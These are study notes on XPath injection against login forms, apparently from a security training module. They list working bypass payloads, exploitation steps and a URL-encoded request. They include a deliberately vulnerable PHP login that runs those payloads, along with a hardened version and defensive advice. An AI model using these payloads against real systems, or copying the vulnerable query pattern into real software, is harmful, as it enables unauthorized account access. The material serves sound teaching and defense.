# XPath Injection - Authentication Bypass

#### **Key Concepts**

1. **What is XPath?**
   * XPath is a query language for selecting nodes from an XML document.
   * It is often used in web applications for data retrieval and authentication mechanisms.
2. **What is XPath Injection?**
   * An attack technique where an attacker manipulates user input to alter the structure of an XPath query, bypassing authentication or gaining unauthorized access.

***

#### **XPath Query Example**

Consider the following XML user data:

```xml
<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>
```

Authentication might use the following query:

```xpath
/users/user[username/text()='USERNAME' and password/text()='PASSWORD']
```

If `USERNAME` and `PASSWORD` are concatenated into this string without escaping, a single quote in either field closes the string literal and the rest of the input is parsed as part of the predicate.

***

#### **Common Payloads**

1. **Universal True (Bypass Authentication)**:

   ```plaintext
   ' or '1'='1
   ```

   Resulting Query (payload supplied in both the username and the password field):

   ```xpath
   /users/user[username/text()='' or '1'='1' and password/text()='' or '1'='1']
   ```

   * In XPath `and` binds tighter than `or`, so this is evaluated as `username/text()='' or ('1'='1' and password/text()='') or '1'='1'`. The final `'1'='1'` is true for every `<user>` node, and the application logs in as whichever node it uses first (here `htb-stdnt`).
   * Injected into the username field alone, the payload gives `username/text()='' or ('1'='1' and password/text()='wrong')`, which is false unless the password is correct, so on its own it does not bypass authentication.
2. **Target a Specific User (Admin)**:

   ```plaintext
   admin' or '1'='1
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='admin' or '1'='1' and password/text()='irrelevant']
   ```

   * Evaluated as `username/text()='admin' or ('1'='1' and password/text()='irrelevant')`, the predicate is true for the `admin` node whatever the password field contains.
3. **Position-Based Targeting**:

   ```plaintext
   ' or position()=2 or '
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='' or position()=2 or '' and password/text()='irrelevant']
   ```

   * The trailing `or '` absorbs the rest of the original query: `'' and password/text()='irrelevant'` is false (an empty string is false in XPath), so the predicate reduces to `position()=2` and selects the second `<user>` in the XML file (here `admin`).
   * Change the `2` to a `3` to pivot to the third account, and so on, to walk through every user without knowing any username:

   ```plaintext
   ' or position()=3 or '
   ```
4. **Substring Matching**:

   ```plaintext
   ' or contains(.,'admin') or '
   ```

   Resulting Query:

   ```xpath
   /users/user[username/text()='' or contains(.,'admin') or '' and password/text()='irrelevant']
   ```

   * `contains(., 'admin')` tests the string value of the whole `<user>` node, i.e. the concatenated text of all its child elements, so it matches any user whose username, password or other child element contains "admin".
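The following is an added example and not code from the original notes or from the HTB Academy module the notes summarise. It assumes the server builds the page's query template by string concatenation and evaluates it with PHP's `DOMXPath`, logging in as the first node returned (the page does not show the server code, so that is an assumption). It runs each payload from the list above against the sample `users.xml`, embedded inline as constructed data, and reports which `<user>` node comes back, including the precedence case where `' or '1'='1` in the username field alone fails.

```php
<?php
// Added example (not part of the original notes): minimal vulnerable login
// that builds the page's XPath template by concatenation and runs each
// payload against the sample users.xml (constructed inline).

$usersXml = <<<'XML'
<users>
  <user>
    <username>htb-stdnt</username>
    <password>Academy_student!</password>
  </user>
  <user>
    <username>admin</username>
    <password>admin</password>
  </user>
</users>
XML;

// Vulnerable: untrusted input is interpolated straight into the predicate.
function buildQuery(string $username, string $password): string
{
    return "/users/user[username/text()='$username' and password/text()='$password']";
}

// Returns the username of the first matching <user> node, or null when the
// predicate matches nothing or is not even valid XPath.
function vulnerableLogin(string $usersXml, string $username, string $password): ?string
{
    $doc = new DOMDocument();
    $doc->loadXML($usersXml);
    $xpath = new DOMXPath($doc);

    // DOMXPath::query() returns false (and emits a warning, silenced here) on a syntax error.
    $nodes = @$xpath->query(buildQuery($username, $password));
    if ($nodes === false || $nodes->length === 0) {
        return null;
    }
    return $nodes->item(0)->getElementsByTagName('username')->item(0)->textContent;
}

// [username field, password field, what XPath precedence predicts]
$attempts = [
    ['htb-stdnt',                      'Academy_student!', 'legitimate login'],
    ['admin',                          'wrong',            'normal failure'],
    ["' or '1'='1",                    'wrong',            "username only: 'and' binds tighter, no bypass"],
    ["' or '1'='1",                    "' or '1'='1",      'both fields: first user (htb-stdnt)'],
    ["admin' or '1'='1",               'irrelevant',       'specific user: admin'],
    ["' or position()=2 or '",         'irrelevant',       'second node: admin'],
    ["' or contains(.,'admin') or '",  'irrelevant',       "node whose text contains 'admin': admin"],
];

foreach ($attempts as [$u, $p, $note]) {
    $result = vulnerableLogin($usersXml, $u, $p) ?? '(login failed)';
    printf("%-34s %-18s -> %-16s %s\n", $u, $p, $result, $note);
}
```

Running it with `php` prints one line per attempt; the third row is the one worth noting, since it shows why the "universal true" payload has to go into both fields while the `position()` and `contains()` payloads work from the username field alone.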

***

#### **Steps to Exploit**

1. **Analyze Application Behavior**:
   * Understand how usernames and passwords are processed (e.g., via POST requests, cookies, etc.).
2. **Test for Injection Points**:
   * Inject payloads into the username or password fields to observe server responses.
3. **Craft Payloads**:
   * Use payloads like `position()` or `contains()` to refine your query targeting.
4. **Privilege Escalation**:
   * Use payloads to access specific accounts or enumerate users until the desired privileges are obtained.

***

#### **Practical Exploitation Example**

**Payload to Target Admin (Second User):**

```plaintext
username=' or position()=2 or '&password=irrelevant
```

When this is sent as a form body the quote, spaces and `=` must be URL-encoded (e.g. `username=%27+or+position()%3D2+or+%27&password=irrelevant`); Burp Repeater or `curl --data-urlencode` does that for you.

**Response Example**:

* The response contains `WELCOME SUPERUSER!`, i.e. the application logged in as the second `<user>` node (`admin`) without a valid password.

***

#### **Defense Measures**

1. **Validate Inputs**:
   * Validate against an allowlist (for example, usernames restricted to `[A-Za-z0-9_.-]`) rather than rejecting a list of bad characters such as `'`, `"`, `[` and `]`; blocklists are easy to get wrong.
   * XPath 1.0 string literals have no escape sequence, so a value containing a quote cannot be escaped inside `'...'`; it has to be split into a `concat()` call. Hand-rolled quoting is therefore error-prone.
2. **Parameterized Queries**:
   * Avoid dynamically building XPath queries from untrusted strings. Note that the following only looks parameterized: in PHP, `$username` and `$password` are interpolated into the string, so it is exactly as injectable as the query above.

     ```php
     $query = "/users/user[username/text()=$username and password/text()=$password]";
     ```
   * PHP's `DOMXPath` and `SimpleXMLElement::xpath()` offer no parameter binding. Where the platform supports it, bind values as XPath variables (in Java's `javax.xml.xpath` the `$username` syntax is real and resolved through an `XPathVariableResolver`; XQuery has external variables) so they are never parsed as part of the expression. Otherwise keep the untrusted value out of the expression: look the user up by a safely quoted username only and compare the password in application code.
3. **Hash Passwords**:
   * Store password hashes and compare them in code (e.g. `password_verify()`); the password then never has to appear in the XPath expression at all.
4. **Error Messages**:
   * Avoid detailed error messages that reveal query structures; a raw XPath parser error tells the attacker exactly where their quote landed.
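The following is an added example and not code from the original notes: one way to harden the login in PHP, which has no XPath parameter binding. It combines the defenses above: the username is turned into a proper XPath 1.0 literal (falling back to `concat()` when the value contains both quote kinds), and the password never enters the query, because the user node is fetched by username and the stored hash is checked with `password_verify()`. The user store is constructed sample data with the page's two accounts; the function and variable names are my own.

```php
<?php
// Added example (not part of the original notes): hardened login. The only
// untrusted text that reaches the XPath engine is a correctly quoted literal,
// and the password is compared in code against a stored hash.

// Turn an arbitrary string into an XPath 1.0 string literal. XPath 1.0 has no
// escape sequence inside literals, so a value with both ' and " must be split
// into concat() pieces, e.g.  a'b"c  ->  concat('a', "'", 'b"c')
function xpathLiteral(string $value): string
{
    if (strpos($value, "'") === false) {
        return "'" . $value . "'";
    }
    if (strpos($value, '"') === false) {
        return '"' . $value . '"';
    }
    $parts = array_map(fn(string $p): string => "'" . $p . "'", explode("'", $value));
    return 'concat(' . implode(', "\'", ', $parts) . ')';
}

// Returns the username on success, null otherwise. The password is never
// part of the expression, so it needs no quoting at all.
function safeLogin(string $usersXml, string $username, string $password): ?string
{
    $doc = new DOMDocument();
    $doc->loadXML($usersXml);
    $xpath = new DOMXPath($doc);

    $nodes = $xpath->query('/users/user[username/text()=' . xpathLiteral($username) . ']');
    if ($nodes === false || $nodes->length !== 1) {
        return null; // unknown user, or an ambiguous store
    }
    $storedHash = $nodes->item(0)->getElementsByTagName('password')->item(0)->textContent;
    return password_verify($password, $storedHash) ? $username : null;
}

// Constructed sample store: the page's two users with bcrypt hashes generated
// here. bcrypt output uses only [./A-Za-z0-9$], so it needs no XML escaping.
$template = <<<'XML'
<users>
  <user><username>htb-stdnt</username><password>%s</password></user>
  <user><username>admin</username><password>%s</password></user>
</users>
XML;
$usersXml = sprintf(
    $template,
    password_hash('Academy_student!', PASSWORD_DEFAULT),
    password_hash('admin', PASSWORD_DEFAULT)
);

// The page's payloads, plus a value with both quote kinds to exercise concat().
$attempts = [
    ['admin',                          'admin'],          // the only one that should succeed
    ["' or '1'='1",                    "' or '1'='1"],
    ["admin' or '1'='1",               'irrelevant'],
    ["' or position()=2 or '",         'irrelevant'],
    ["' or contains(.,'admin') or '",  'irrelevant'],
    ["a'b\"c",                         'x'],
];

foreach ($attempts as [$u, $p]) {
    printf("%-34s literal=%-42s -> %s\n",
        $u, xpathLiteral($u), safeLogin($usersXml, $u, $p) ?? '(login failed)');
}
```

Only the `admin`/`admin` row logs in; every payload is now compared, quotes and all, as a literal username that does not exist. An allowlist check on the username before `xpathLiteral()` is still worth adding as defense in depth, but the literal builder is what makes the query safe for any input.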

***

#### **Key Takeaways**

* XPath Injection is similar to SQL Injection but targets XML queries.
* Functions like `position()` and `contains()` can help refine targeting in complex scenarios.
* Proper sanitization and secure coding practices are essential to mitigate these attacks.

***

#### **Payloads to Remember**

| **Scenario**                       | **Payload**                            | **Result**                                                          |
| ---------------------------------- | -------------------------------------- | ------------------------------------------------------------------- |
| Bypass Authentication              | `' or '1'='1` (in both fields)         | Logs in as the first user.                                          |
| Target Specific User (e.g., Admin) | `admin' or '1'='1`                     | Logs in as admin regardless of the password.                        |
| Position-Based User Targeting      | `' or position()=2 or '`               | Logs in as the second user; change the number to pivot.             |
| Substring Matching (Admin)         | `' or contains(.,'admin') or '`        | Logs in as the first user whose text content contains "admin".      |

